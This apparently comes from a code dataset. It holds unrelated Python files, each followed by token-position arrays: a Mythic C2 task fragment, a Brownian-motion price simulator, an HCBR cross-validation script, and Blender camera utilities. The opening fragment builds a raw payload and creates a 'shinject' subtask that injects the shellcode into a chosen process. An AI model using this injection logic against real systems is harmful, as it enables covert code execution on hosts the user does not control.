payload_uuid=gen_resp.response["uuid"],
get_contents=True)
if resp.status == MythicStatus.Success:
if resp.response["build_phase"] == 'success':
b64contents = resp.response["contents"]
pe = base64.b64decode(b64contents)
if len(pe) > 1 and pe[:2] == b"\x4d\x5a":
raise Exception("Inject requires a payload of Raw output, but got an executable.")
# it's done, so we can register a file for it
task.display_params = "payload '{}' into PID {}".format(temp.response["tag"], task.args.get_arg("pid"))
response = await MythicRPC().execute("create_subtask", parent_task_id=task.id,
command="shinject", params_dict={"PID": task.args.get_arg("pid"), "Shellcode File ID": resp.response["file"]["agent_file_id"]},
subtask_callback_function="shinject_completed")
task.status = MythicStatus.Processed
break
elif resp.response["build_phase"] == 'error':
raise Exception("Failed to build new payload: " + resp.response["error_message"])
else:
await asyncio.sleep(1)
else:
raise Exception("Failed to build payload from template {}".format(task.args.get_arg("template")))
return task
async def process_response(self, response: AgentResponse):
pass
| [
[
[
59,
60
]
],
[
[
68,
72
]
],
[
[
124,
125
],
[
163,
176
],
[
863,
874
],
[
303,
319
],
[
350,
363
],
[
497,
513
],
[
531,
544
],
[
1432,
1442
],
[
1363,
1373
],
[
1466,
1478
],
[
1566,
1576
],
[
1551,
1561
],
[
1599,
1608
],
[
1744,
1753
],
[
2117,
2129
],
[
2252,
2261
],
[
2479,
2491
],
[
3106,
3115
],
[
3464,
3476
],
[
3745,
3752
],
[
3954,
3967
]
],
[
[
133,
139
],
[
2660,
2666
]
],
[
[
147,
162
],
[
1270,
1285
]
],
[
[
849,
862
]
]
] |
import numpy as np
from .base import Price
class GBM(Price):
"""Brownian motion."""
def __init__(self, T=1., sigma1=0.02, sigma2=0.01, s1=1., s2=1.,
drift1=0., drift2=0., n=100):
self.sigma1 = sigma1
self.sigma2 = sigma2
self.drift1 = drift1
self.drift2 = drift2
self.n = n
self.s1 = s1
self.s2 = s2
self.T = T
def generate(self):
dt1 = self.sigma1 ** 2 * self.T / self.n
dt2 = self.sigma2 ** 2 * self.T / self.n
bm1 = np.r_[[0.], np.sqrt(dt1) * np.random.randn(self.n - 1).cumsum()]
bm2 = np.r_[[0.], np.sqrt(dt2) * np.random.randn(self.n - 1).cumsum()]
path = np.c_[np.linspace(0, self.T, self.n), bm1, bm2]
path[:, 1] = np.exp((self.drift1 - self.sigma1 ** 2 / 2.) * path[:, 0] + self.sigma1 * path[:, 1])
path[:, 2] = np.exp((self.drift2 - self.sigma2 ** 2 / 2.) * path[:, 0] + self.sigma2 * path[:, 2])
path[:, 1] *= self.s1
path[:, 2] *= self.s2
return path
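# Usage sketch (illustrative parameters):
#   gbm = GBM(T=1., n=250)
#   path = gbm.generate()   # ndarray of shape (n, 3): columns are [time, price_1, price_2]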
| [
[
[
7,
18
],
[
540,
542
],
[
552,
554
],
[
567,
569
],
[
619,
621
],
[
631,
633
],
[
646,
648
],
[
700,
702
],
[
706,
708
],
[
769,
771
],
[
876,
878
]
],
[
[
37,
42
],
[
54,
59
]
],
[
[
50,
53
]
]
] |
import json
import os, errno
import sys
import time
import shutil
import subprocess
from subprocess import Popen, PIPE
EXECUTABLE = 'hcbr_learning'
BUILD_FOLDER = '../build'
DATA_FOLDER = '../data'
KFOLD_SCRIPT = 'kfold_validation.py'
ACCURACY_ROW = 4
#METAOPTIMIZATION = '../tuning/hyperopt_wrapper.py'
#METAOPTIMIZATION_TIMEOUT = 60
METAOPTIMIZATION = '../script/genetic_algorithm.py'
def convert_paramILS_to_HCBR_params(paramILS):
convert_map = {
'e': 'eta',
'd': 'delta',
'g': 'gamma',
'i': 'online',
'p': 'learning_phases',
'z': 'heuristic'
}
def if_exists(k, v):
if k in convert_map:
return convert_map[k], v
else:
return None, None
params = {}
for k, v in paramILS.iteritems():
key, val = if_exists(k, v)
if key is not None:
params[key] = val
return params
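# Example (illustrative): convert_paramILS_to_HCBR_params({'e': 0.1, 'd': 0.5, 'x': 1})
# yields {'eta': 0.1, 'delta': 0.5}; keys without a mapping are silently dropped.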
def read_outcomes(path):
cases = []
headers = []
with open(path, 'rb') as csvfile:
reader = csvfile.readlines()
n = len(reader[0].split())
for i, row in enumerate(reader):
cases.append(int(row))
return cases
def main():
executable_path = os.path.join(BUILD_FOLDER, EXECUTABLE)
k = int(sys.argv[1])
l = float(sys.argv[2])
instance_name = sys.argv[3]
seed = None
if len(sys.argv) > 4:
seed = sys.argv[4]
only_analysis = False
if len(sys.argv) > 5:
only_analysis = True if sys.argv[5] == 'True' else False
if len(sys.argv) > 6:
nested_CV = True if sys.argv[6] == 'True' else False
suffix = ""
if len(sys.argv) > 7:
suffix = "_" + sys.argv[7]
path = instance_name
file_name = path.split('/')[-1].split('.')[0]
base_name = file_name.split('.')[0]
# Check build, executable and paths
base_output_path = "{}{}".format(instance_name, suffix)
if not only_analysis:
try:
shutil.rmtree(base_output_path)
except:
pass
try:
os.makedirs(base_output_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Create the casebase
print('# Create casebase and outcome files...')
process_script = os.path.join(DATA_FOLDER, "process_{}.py".format(instance_name))
data_location = os.path.join(DATA_FOLDER, "{}.txt".format(instance_name))
cmd = "python {} {}".format(process_script, data_location)
rc = subprocess.call(cmd, shell=True)
print('CMD: {}'.format(cmd))
print('RC: {}'.format(rc))
if rc:
exit(1)
path_casebase = os.path.join("{}_casebase.txt".format(instance_name))
path_outcomes = os.path.join("{}_outcomes.txt".format(instance_name))
try:
outcomes = read_outcomes(path_outcomes)
except Exception as e:
print(e)
exit(1)
n = len(outcomes)
# Create the k-folds
print('# Create k-folds files for validation...')
fold_creation_output = os.path.join(base_output_path, 'kfold_creation.log')
cmd_fold_validation = "python {} {} {} {} {} {} > {}".format(
KFOLD_SCRIPT,
k,
path_casebase,
path_outcomes,
os.path.join(base_output_path, "input_data"),
seed if seed is not None else "",
fold_creation_output
)
print('CMD: {}'.format(cmd_fold_validation))
rc = subprocess.call(cmd_fold_validation, shell=True)
print('RC: {}'.format(rc))
if rc:
exit(1)
# Read configuration
print('# Read configuration for this instance...')
examples = int(round(n * l))
parameters_path = os.path.join(DATA_FOLDER, "parameters", "{}.params.json".format(instance_name))
default_params = {
# TODO
}
parameters = None
try:
with open(parameters_path) as json_data:
parameters = json.load(json_data)
except Exception as e:
print('[ERROR] Could not retrieve parameters. Use default parameters.')
print(e)
if parameters is None:
parameters = default_params
else:
for key, v in default_params.iteritems():
if key not in parameters:
print('# - Add {}={} as parameter because value not found'.format(key, v))
parameters[key] = v
print('# Configuration: {}'.format(parameters))
# Start validation runs
print('# Start validation runs...')
average_accuracy = 0
for i in range(0, k):
print('\n#########################')
print('# - Run {}'.format(i))
print('#########################')
run_nb = 'run_{}'.format(i)
fold_casebase = os.path.join("../experiments", base_output_path, "input_data", "{}_casebase.fold_{}.txt".format(instance_name, i))
fold_outcomes = os.path.join("../experiments", base_output_path, "input_data", "{}_outcomes.fold_{}.txt".format(instance_name, i))
fold_output_path = os.path.join("../experiments", base_output_path, run_nb)
parameters_path = os.path.join(DATA_FOLDER, "parameters", "{}.params.json".format(instance_name))
default_params = {
# TODO
}
parameters = None
try:
with open(parameters_path) as json_data:
parameters = json.load(json_data)
except Exception as e:
print('[ERROR] Could not retrieve parameters. Use default parameters.')
print(e)
parameters["input"]["casebase"] = fold_casebase
parameters["input"]["outcomes"] = fold_outcomes
parameters["parameters"]["limit"] = examples
parameters["parameters"]["run_id"] = i
if not only_analysis:
try:
shutil.rmtree(fold_output_path)
except:
pass
try:
os.makedirs(fold_output_path)
except OSError as e:
if e.errno != errno.EEXIST:
print('[ERROR] Could not create output path for {}'.format(run_nb))
continue
if(nested_CV):
print('# Start Meta-optimization for Model Selection')
print('# Preliminary run')
fold_param_file = os.path.join(fold_output_path, 'params_{}.init.json'.format(run_nb))
with open(fold_param_file, 'w') as f:
f.write(json.dumps(parameters, indent=4))
print('# Initial configuration: {}'.format(parameters))
cmd = "{} --params {} > {} 2> {}".format(executable_path,
fold_param_file,
os.path.join(fold_output_path, 'output_{}.init.txt'.format(run_nb)),
os.path.join(fold_output_path, 'log_{}.init.txt'.format(run_nb))
)
'''
cmd = "{} -c {} -o {} -l {} -s -p {} -e {} -d {} -g {} {} {} -b {} > {} 2> {}".format(
executable_path,
fold_casebase,
fold_outcomes,
examples,
parameters['learning_phases'],
parameters['eta'],
parameters['delta'],
parameters['gamma'],
'-i' if int(parameters['online']) == 1 else "",
'-z' if int(parameters['heuristic']) == 1 else "",
i,
os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)),
os.path.join(fold_output_path, 'log_{}.txt'.format(run_nb))
)
'''
print('# CMD: {}'.format(cmd))
rc = subprocess.call(cmd, shell=True)
p = Popen(['tail', '-n', '1', os.path.join(fold_output_path, 'output_{}.init.txt'.format(run_nb))], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
prun_accuracy = float(output.split()[ACCURACY_ROW])
print('# Preliminary run accuracy: {}'.format(prun_accuracy))
cmd = "python {} \
--weights ../experiments/W.txt \
--mu0 ../experiments/Mu_0_post_training.txt \
--mu1 ../experiments/Mu_1_post_training.txt \
--outcomes {}".format(METAOPTIMIZATION, fold_outcomes)
print('# CMD: {}'.format(cmd))
p = Popen(cmd.split(), stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
parameters_path = os.path.join(DATA_FOLDER, "parameters", "{}.optimized.params.json".format(instance_name))
parameters = json.load(open(parameters_path))
parameters["deserialization"]["mu0_file"] = "../experiments/Mu_0_optimized.txt"
parameters["deserialization"]["mu1_file"] = "../experiments/Mu_1_optimized.txt"
parameters["input"]["casebase"] = fold_casebase
parameters["input"]["outcomes"] = fold_outcomes
parameters["parameters"]["limit"] = examples
parameters["parameters"]["run_id"] = i
fold_param_file = os.path.join(fold_output_path, 'params_{}.json'.format(run_nb))
with open(fold_param_file, 'w') as f:
f.write(json.dumps(parameters, indent=4))
print('# Final configuration: {}'.format(parameters))
cmd = "{} --params {} > {} 2> {}".format(executable_path,
fold_param_file,
os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)),
os.path.join(fold_output_path, 'log_{}.txt'.format(run_nb))
)
print('# CMD: {}'.format(cmd))
rc = subprocess.call(cmd, shell=True)
try:
shutil.move("training.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "training.run_{}.log.csv".format(i)))
shutil.move("prediction.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "prediction.run_{}.log.csv".format(i)))
shutil.move("overlap.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "overlap.run_{}.log.csv".format(i)))
shutil.move("strength.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "strength.run_{}.log.csv".format(i)))
except Exception as e:
pass
p = Popen(['tail', '-n', '1', os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb))], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
run_accuracy = float(output.split()[ACCURACY_ROW])
average_accuracy += run_accuracy
print("# Accuracy: {}".format(run_accuracy))
print('# Analyze the results...')
try:
# Confusion matrix
cmd_confusion_matrix = "python ../utils/confusion_matrix.py {}".format(os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)))
cmd_cm_gp = "gnuplot {}".format('output_{}_confusion_matrix.gp'.format(run_nb))
rc = subprocess.call(cmd_confusion_matrix, shell=True)
rc = subprocess.call(cmd_cm_gp, shell=True)
shutil.move('output_{}_confusion_matrix.gp'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix.gp'.format(run_nb)))
shutil.move('output_{}_confusion_matrix.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix.txt'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_0.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_0.png'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_1.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_1.png'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_2.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_2.png'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_0.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_0.svg'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_1.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_1.svg'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_2.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_2.svg'.format(run_nb)))
# Prediction analysis
cmd_prediction_analysis ="python ../utils/prediction_analysis.py {path} ".format(
path=os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb))
)
cmd_pa_gp = "gnuplot {}".format('output_{}_diff_pred.gp'.format(run_nb))
rc = subprocess.call(cmd_prediction_analysis, shell=True)
rc = subprocess.call(cmd_pa_gp, shell=True)
shutil.move('output_{}_diff_bad_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_bad_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_negative_bad_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_negative_bad_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_negative_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_negative_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_positive_bad_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_positive_bad_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred.txt'.format(run_nb)))
shutil.move('output_{}_positive_diff_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_positive_diff_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_pred.gp'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred.gp'.format(run_nb)))
shutil.move('output_{}_diff_pred_0.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_0.png'.format(run_nb)))
            shutil.move('output_{}_diff_pred_1.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_1.png'.format(run_nb)))
shutil.move('output_{}_diff_pred_0.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_0.svg'.format(run_nb)))
            shutil.move('output_{}_diff_pred_1.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_1.svg'.format(run_nb)))
# ROC
cmd_roc ="python ../utils/roc.py {path} ".format(
path=os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb))
)
print('CMD: {}'.format(cmd_roc))
rc = subprocess.call(cmd_roc, shell=True)
shutil.move('roc.png', os.path.join(base_output_path, "run_{}".format(i), 'roc.png'))
# Time
cmd_time ="python ../utils/time_analysis.py {path} ".format(
path=os.path.join(os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)))
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, "run_{}".format(i), 'output_{}_time.gp'.format(run_nb)).format(run_nb))
#rc = subprocess.call(cmd_time, shell=True)
#rc = subprocess.call(cmd_time_gp, shell=True)
except Exception as e:
print(e)
print('# Analyze all runs...')
try:
cmd_analyze_runs ="python ../utils/analyze_runs.py {path} {instance} {k} {instance} 'table:{instance}' '{caption}'".format(
instance=instance_name,
path="hcbr.global.log.csv" if not only_analysis else os.path.join(base_output_path, "hcbr.global.log.csv"),
k=k,
caption="Confusion matrix and performances indicators for the \\texttt{" + instance_name +"} dataset."
)
rc = subprocess.call(cmd_analyze_runs, shell=True)
print('CMD: {}'.format(cmd_analyze_runs))
cmd_confusion_matrix = "python ../utils/confusion_matrix.py {}".format(os.path.join(base_output_path, 'output.average.txt'))
cmd_cm_gp = "gnuplot {}".format('output_confusion_matrix.gp')
rc = subprocess.call(cmd_confusion_matrix, shell=True)
rc = subprocess.call(cmd_cm_gp, shell=True)
shutil.move('output_confusion_matrix.gp', os.path.join(base_output_path, 'output_confusion_matrix.gp'))
shutil.move('output_confusion_matrix.txt', os.path.join(base_output_path, 'output_confusion_matrix.txt'))
shutil.move('output_confusion_matrix_0.png', os.path.join(base_output_path, 'output_confusion_matrix_0.png'))
shutil.move('output_confusion_matrix_1.png', os.path.join(base_output_path, 'output_confusion_matrix_1.png'))
shutil.move('output_confusion_matrix_2.png', os.path.join(base_output_path, 'output_confusion_matrix_2.png'))
shutil.move('output_confusion_matrix_0.svg', os.path.join(base_output_path, 'output_confusion_matrix_0.svg'))
shutil.move('output_confusion_matrix_1.svg', os.path.join(base_output_path, 'output_confusion_matrix_1.svg'))
shutil.move('output_confusion_matrix_2.svg', os.path.join(base_output_path, 'output_confusion_matrix_2.svg'))
# Prediction analysis
cmd_prediction_analysis ="python ../utils/prediction_analysis.py {path} ".format(
path=os.path.join(base_output_path, 'output.average.txt')
)
cmd_pa_gp = "gnuplot {}".format('output.average_diff_pred.gp')
rc = subprocess.call(cmd_prediction_analysis, shell=True)
rc = subprocess.call(cmd_pa_gp, shell=True)
shutil.move('output.average_diff_bad_pred.txt', os.path.join(base_output_path, 'output.average_diff_bad_pred.txt'))
shutil.move('output.average_diff_negative_bad_pred.txt', os.path.join(base_output_path, 'output.average_diff_negative_bad_pred.txt'))
shutil.move('output.average_diff_negative_pred.txt', os.path.join(base_output_path, 'output.average_diff_negative_pred.txt'))
shutil.move('output.average_diff_positive_bad_pred.txt', os.path.join(base_output_path, 'output.average_diff_positive_bad_pred.txt'))
shutil.move('output.average_diff_pred.txt', os.path.join(base_output_path, 'output.average_diff_pred.txt'))
shutil.move('output.average_positive_diff_pred.txt', os.path.join(base_output_path, 'output.average_positive_diff_pred.txt'))
shutil.move('output.average_diff_pred.gp', os.path.join(base_output_path, 'output.average_diff_pred.gp'))
shutil.move('output.average_diff_pred_0.png', os.path.join(base_output_path, 'output.average_diff_pred_0.png'))
shutil.move('output.average_diff_pred_1.png', os.path.join(base_output_path, 'output.average_diff_pred_1.png'))
shutil.move('output.average_diff_pred_0.svg', os.path.join(base_output_path, 'output.average_diff_pred_0.svg'))
shutil.move('output.average_diff_pred_1.svg', os.path.join(base_output_path, 'output.average_diff_pred_1.svg'))
# ROC
cmd_roc ="python ../utils/roc.py {path} ".format(
path=os.path.join(base_output_path, 'output.average.txt')
)
print('CMD: {}'.format(cmd_roc))
rc = subprocess.call(cmd_roc, shell=True)
shutil.move('roc.png', os.path.join(base_output_path, 'roc.png'))
# Time
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'output.average.txt'),
column=10
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'output.average_time.gp'))
rc = subprocess.call(cmd_time, shell=True)
rc = subprocess.call(cmd_time_gp, shell=True)
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'overlap.average.log.csv'),
column=3
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'overlap.average.log_time.gp'))
rc = subprocess.call(cmd_time, shell=True)
rc = subprocess.call(cmd_time_gp, shell=True)
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'strength.average.log.csv'),
column=5
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'strength.average.log_time.gp'))
rc = subprocess.call(cmd_time, shell=True)
rc = subprocess.call(cmd_time_gp, shell=True)
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'training.average.log.csv'),
column=1
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'training.average.log_time.gp'))
#rc = subprocess.call(cmd_time, shell=True)
#rc = subprocess.call(cmd_time_gp, shell=True)
except Exception as e:
print(e)
if not only_analysis:
print('# Copy the results...')
shutil.move("hcbr.global.log.csv", os.path.join(base_output_path, "hcbr.global.log.csv"))
shutil.move("{}_casebase.txt".format(instance_name), os.path.join(base_output_path, "{}_casebase.txt".format(instance_name)))
shutil.move("{}_outcomes.txt".format(instance_name), os.path.join(base_output_path, "{}_outcomes.txt".format(instance_name)))
msg = "{} {} {}\n".format(instance_name, seed, average_accuracy / float(k))
sys.stderr.write(msg)
print(msg)
if __name__ == '__main__':
main() | [
[
[
7,
11
],
[
4054,
4058
],
[
5531,
5535
],
[
6622,
6626
],
[
8971,
8975
],
[
9597,
9601
]
],
[
[
19,
21
],
[
1206,
1208
],
[
2043,
2045
],
[
2277,
2279
],
[
2366,
2368
],
[
2668,
2670
],
[
2746,
2748
],
[
3083,
3085
],
[
3313,
3315
],
[
3789,
3791
],
[
4900,
4902
],
[
5040,
5042
],
[
5182,
5184
],
[
5266,
5268
],
[
6071,
6073
],
[
6470,
6472
],
[
6867,
6869
],
[
6960,
6962
],
[
8052,
8054
],
[
8852,
8854
],
[
9458,
9460
],
[
9826,
9828
],
[
9910,
9912
],
[
10170,
10172
],
[
10326,
10328
],
[
10481,
10483
],
[
10634,
10636
],
[
10821,
10823
],
[
11303,
11305
],
[
11667,
11669
],
[
11840,
11842
],
[
12016,
12018
],
[
12194,
12196
],
[
12372,
12374
],
[
12550,
12552
],
[
12728,
12730
],
[
12906,
12908
],
[
13171,
13173
],
[
13542,
13544
],
[
13719,
13721
],
[
13901,
13903
],
[
14083,
14085
],
[
14256,
14258
],
[
14425,
14427
],
[
14593,
14595
],
[
14767,
14769
],
[
14931,
14933
],
[
15095,
15097
],
[
15259,
15261
],
[
15470,
15472
],
[
15681,
15683
],
[
15870,
15872
],
[
15883,
15885
],
[
16007,
16009
],
[
16556,
16558
],
[
16944,
16946
],
[
17246,
17248
],
[
17359,
17361
],
[
17475,
17477
],
[
17593,
17595
],
[
17711,
17713
],
[
17829,
17831
],
[
17947,
17949
],
[
18065,
18067
],
[
18268,
18270
],
[
18585,
18587
],
[
18718,
18720
],
[
18856,
18858
],
[
18994,
18996
],
[
19124,
19126
],
[
19249,
19251
],
[
19373,
19375
],
[
19503,
19505
],
[
19623,
19625
],
[
19743,
19745
],
[
19863,
19865
],
[
20031,
20033
],
[
20216,
20218
],
[
20381,
20383
],
[
20509,
20511
],
[
20767,
20769
],
[
20899,
20901
],
[
21162,
21164
],
[
21295,
21297
],
[
21559,
21561
],
[
21692,
21694
],
[
22017,
22019
],
[
22133,
22135
],
[
22267,
22269
]
],
[
[
23,
28
],
[
2128,
2133
],
[
6164,
6169
]
],
[
[
36,
39
],
[
1258,
1261
],
[
1285,
1288
],
[
1318,
1321
],
[
1357,
1360
],
[
1387,
1390
],
[
1436,
1439
],
[
1483,
1486
],
[
1527,
1530
],
[
1570,
1573
],
[
1630,
1633
],
[
1668,
1671
],
[
22433,
22436
]
],
[
[
47,
51
]
],
[
[
59,
65
],
[
1953,
1959
],
[
5965,
5971
],
[
10121,
10127
],
[
10275,
10281
],
[
10433,
10439
],
[
10585,
10591
],
[
11607,
11613
],
[
11779,
11785
],
[
11953,
11959
],
[
12131,
12137
],
[
12309,
12315
],
[
12487,
12493
],
[
12665,
12671
],
[
12843,
12849
],
[
13484,
13490
],
[
13652,
13658
],
[
13838,
13844
],
[
14016,
14022
],
[
14202,
14208
],
[
14362,
14368
],
[
14540,
14546
],
[
14711,
14717
],
[
14875,
14881
],
[
15039,
15045
],
[
15203,
15209
],
[
15658,
15664
],
[
17204,
17210
],
[
17316,
17322
],
[
17430,
17436
],
[
17548,
17554
],
[
17666,
17672
],
[
17784,
17790
],
[
17902,
17908
],
[
18020,
18026
],
[
18537,
18543
],
[
18661,
18667
],
[
18803,
18809
],
[
18937,
18943
],
[
19080,
19086
],
[
19196,
19202
],
[
19330,
19336
],
[
19457,
19463
],
[
19577,
19583
],
[
19697,
19703
],
[
19817,
19823
],
[
20193,
20199
],
[
21982,
21988
],
[
22080,
22086
],
[
22214,
22220
]
],
[
[
73,
83
],
[
2504,
2514
],
[
3518,
3528
],
[
7973,
7983
],
[
10055,
10065
],
[
11476,
11486
],
[
11543,
11553
],
[
13350,
13360
],
[
13420,
13430
],
[
15609,
15619
],
[
16768,
16778
],
[
17081,
17091
],
[
17144,
17154
],
[
18415,
18425
],
[
18481,
18491
],
[
20148,
20158
],
[
20580,
20590
],
[
20631,
20641
],
[
20975,
20985
],
[
21026,
21036
],
[
21372,
21382
],
[
21423,
21433
]
],
[
[
107,
112
],
[
8026,
8031
],
[
8714,
8719
],
[
10795,
10800
]
],
[
[
114,
118
],
[
8128,
8132
],
[
8141,
8145
],
[
8154,
8158
],
[
8739,
8743
],
[
8752,
8756
],
[
8765,
8769
],
[
10892,
10896
],
[
10905,
10909
],
[
10918,
10922
]
],
[
[
120,
130
],
[
1233,
1243
]
],
[
[
149,
161
],
[
1219,
1231
]
],
[
[
175,
186
],
[
2290,
2301
],
[
2379,
2390
],
[
3802,
3813
],
[
5279,
5290
],
[
8865,
8876
]
],
[
[
199,
211
],
[
3218,
3230
]
],
[
[
236,
248
],
[
8259,
8271
],
[
11014,
11026
]
],
[
[
338,
354
],
[
8614,
8630
]
],
[
[
395,
426
]
],
[
[
915,
928
],
[
2836,
2849
]
],
[
[
1176,
1180
],
[
22513,
22517
]
]
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: DIYer22@github
@mail: ylxx@live.com
Created on Thu Jan 16 18:17:20 2020
"""
from boxx import *
from boxx import deg2rad, np, pi
import bpy
import random
def set_cam_pose(cam_radius=1, cam_deg=45, cam_x_deg=None, cam=None):
cam_rad = deg2rad(cam_deg)
if cam_x_deg is None:
cam_x_deg = random.uniform(0, 360)
cam_x_rad = deg2rad(cam_x_deg)
z = cam_radius * np.sin(cam_rad)
xy = (cam_radius ** 2 - z ** 2) ** 0.5
x = xy * np.cos(cam_x_rad)
y = xy * np.sin(cam_x_rad)
cam = cam or bpy.data.objects["Camera"]
cam.location = x, y, z
cam.rotation_euler = pi / 2 - cam_rad, 0.1, pi / 2 + cam_x_rad
cam.scale = (0.1,) * 3
return cam
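# Usage sketch (illustrative values): set_cam_pose(cam_radius=2, cam_deg=60) places the default
# "Camera" object on a sphere of radius 2, elevated 60 degrees, roughly oriented toward the origin.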
def set_cam_intrinsic(cam, intrinsic_K, hw=None):
"""
K = [[f_x, 0, c_x],
[0, f_y, c_y],
[0, 0, 1]]
    Reference: https://www.rojtberg.net/1601/from-blender-to-opencv-camera-and-back/
"""
    scene = bpy.context.scene  # needed below for the pixel aspect settings even when hw is given
    if hw is None:
        hw = scene.render.resolution_y, scene.render.resolution_x
near = lambda x, y=0, eps=1e-5: abs(x - y) < eps
assert near(intrinsic_K[0][1], 0)
assert near(intrinsic_K[1][0], 0)
h, w = hw
f_x = intrinsic_K[0][0]
f_y = intrinsic_K[1][1]
c_x = intrinsic_K[0][2]
c_y = intrinsic_K[1][2]
cam = cam.data
cam.shift_x = -(c_x / w - 0.5)
cam.shift_y = (c_y - 0.5 * h) / w
cam.lens = f_x / w * cam.sensor_width
pixel_aspect = f_y / f_x
scene.render.pixel_aspect_x = 1.0
scene.render.pixel_aspect_y = pixel_aspect
def remove_useless_data():
"""
    remove all unused data blocks (those with no users) and release RAM
"""
for block in bpy.data.meshes:
if block.users == 0:
bpy.data.meshes.remove(block)
for block in bpy.data.materials:
if block.users == 0:
bpy.data.materials.remove(block)
for block in bpy.data.textures:
if block.users == 0:
bpy.data.textures.remove(block)
for block in bpy.data.images:
if block.users == 0:
bpy.data.images.remove(block)
def clear_all():
[
bpy.data.objects.remove(obj)
for obj in bpy.data.objects
if obj.type in ("MESH", "LIGHT", "CURVE")
]
remove_useless_data()
def set_shading_mode(mode="SOLID", screens=[]):
"""
Performs an action analogous to clicking on the display/shade button of
the 3D view. Mode is one of "RENDERED", "MATERIAL", "SOLID", "WIREFRAME".
The change is applied to the given collection of bpy.data.screens.
If none is given, the function is applied to bpy.context.screen (the
active screen) only. E.g. set all screens to rendered mode:
set_shading_mode("RENDERED", bpy.data.screens)
"""
screens = screens if screens else [bpy.context.screen]
for s in screens:
for spc in s.areas:
if spc.type == "VIEW_3D":
spc.spaces[0].shading.type = mode
break # we expect at most 1 VIEW_3D space
def add_stage(size=2, transparency=False):
"""
add PASSIVE rigidbody cube for physic stage or depth background
Parameters
----------
size : float, optional
size of stage. The default is 2.
transparency : bool, optional
transparency for rgb but set limit for depth. The default is False.
"""
import bpycv
bpy.ops.mesh.primitive_cube_add(size=size, location=(0, 0, -size / 2))
stage = bpy.context.active_object
stage.name = "stage"
with bpycv.activate_obj(stage):
bpy.ops.rigidbody.object_add()
stage.rigid_body.type = "PASSIVE"
if transparency:
stage.rigid_body.use_margin = True
stage.rigid_body.collision_margin = 0.04
stage.location.z -= stage.rigid_body.collision_margin
material = bpy.data.materials.new("transparency_stage_bpycv")
material.use_nodes = True
material.node_tree.nodes.clear()
with bpycv.activate_node_tree(material.node_tree):
bpycv.Node("ShaderNodeOutputMaterial").Surface = bpycv.Node(
"ShaderNodeBsdfPrincipled", Alpha=0
).BSDF
stage.data.materials.append(material)
return stage
if __name__ == "__main__":
pass
| [
[
[
154,
155
]
],
[
[
173,
180
],
[
301,
308
],
[
403,
410
]
],
[
[
182,
184
],
[
443,
445
],
[
515,
517
],
[
546,
548
]
],
[
[
186,
188
],
[
660,
662
],
[
683,
685
]
],
[
[
197,
200
],
[
581,
584
],
[
996,
999
],
[
1684,
1687
],
[
1742,
1745
],
[
1790,
1793
],
[
1851,
1854
],
[
1902,
1905
],
[
1962,
